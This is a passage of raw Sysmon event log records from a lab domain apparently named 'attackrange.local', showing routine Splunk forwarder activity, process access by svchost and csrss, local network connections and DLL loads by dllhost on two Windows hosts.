Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095375Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:07.057{761B69BB-7AAB-6080-9B5F-00000000BA01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000001606697Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:08.450{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606696Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:08.450{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00043F4A427514DEB210B4B5BA0A2309,SHA256=2B5190FC4BB5AB0E8354C49C424AA79180F5AF2067CBFD5863A2FD7B6DD0208Bfalsefalse - insufficient disk space 10341000x80000000000000001095389Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:08.478{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095388Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:08.478{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095387Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:08.112{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=152CB0188A156ACF6FC83664D4B96E4C,SHA256=A1D96AAFF20D7E984B939826883C974204BFE50F1CA58B86402F557C995F2679,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606695Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:06.631{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49739-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606694Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:08.102{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606693Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:08.102{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A7072D613135A98E1933758599669BB,SHA256=5DEE7351E8D26A7BD32B3B78AA60A9D5AD0A8DEFB5063F3D3C2B5A78836EA7B6falsefalse - insufficient disk space 11241100x80000000000000001606692Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:08.102{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606691Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:08.102{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD1F1147D1D793939BC56600578BA460,SHA256=59DFD2FBCB98C938E076B44539A6B83C8C9887973FE6CB8D46379A7D9D3877C2falsefalse - insufficient disk space 23542300x80000000000000001095386Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:08.059{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF874CE015983D7B28C90FE7D9CE59F4,SHA256=5861069BFF5FC05B05B10C9197B88C3B4593F5655A3159DC4B266E7F629D7081,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606829Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.622{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606828Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.622{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCCAE2CC246049428DB66D1833BED12B,SHA256=A711F48361C441B8086D67CADB4E7488C6E3F1F3D459639119DAF6C0274D7E17falsefalse - insufficient disk space 11241100x80000000000000001606827Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.622{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606826Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.622{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=468670F070B37D775C7C53DAFA6DEB0D,SHA256=5467CB976A1119035EAEC25A6F2C6B455B1C840E58958449F01465926C373A5Afalsefalse - insufficient disk space 10341000x80000000000000001095402Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.990{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7AAD-6080-9C5F-00000000BA01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095401Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.988{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095400Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.988{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095399Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.988{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095398Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.988{761B69BB-818C-607D-0C00-00000000BA01}8445632C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095397Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.987{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7AAD-6080-9C5F-00000000BA01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095396Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.987{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7AAD-6080-9C5F-00000000BA01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095395Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.987{761B69BB-7AAD-6080-9C5F-00000000BA01}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001095394Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:04.748{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1167-false10.0.1.12-8000- 10341000x80000000000000001095393Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.479{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095392Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.479{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095391Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.384{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BE21ADE329D88E703D4C8B241A4116D,SHA256=5A97988F30B11507CA5D0078A4399C34E3BBF8616444E2236BA45B62D10668C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095390Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:09.115{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C85033CC4A440C5F964A0BA2BEC587D,SHA256=DF114E89D87581C673DD6D0E13305D75E30420A2570E6D31164F200A57283D13,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000001606825Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.421{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001606824Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.421{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001606823Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.421{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValid 734700x80000000000000001606822Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.421{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x80000000000000001606821Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.421{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\thumbcache.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Thumbnail CacheMicrosoft® Windows® Operating SystemMicrosoft Corporationthumbcache.dllMD5=C146766884A92B154F2EB38463F2263D,SHA256=48C5CC7760187EDB140A904D3AC5FD24F740973CDBA07962047859F84E7BEB9CtrueMicrosoft WindowsValid 10341000x80000000000000001606820Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.406{21761711-83AE-607D-1600-00000000BB01}11082420C:\Windows\system32\svchost.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606819Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.406{21761711-83AE-607D-1600-00000000BB01}11081152C:\Windows\system32\svchost.exe{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606818Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.406{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x80000000000000001606817Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.406{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x80000000000000001606816Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.406{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001606815Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.406{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001606814Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.406{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001606813Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.390{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001606812Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:09.390{21761711-7AAD-6080-C960-00000000BB01}5300C:\Windows\System32\dllhost.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 10341000x80000000000000001606811Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 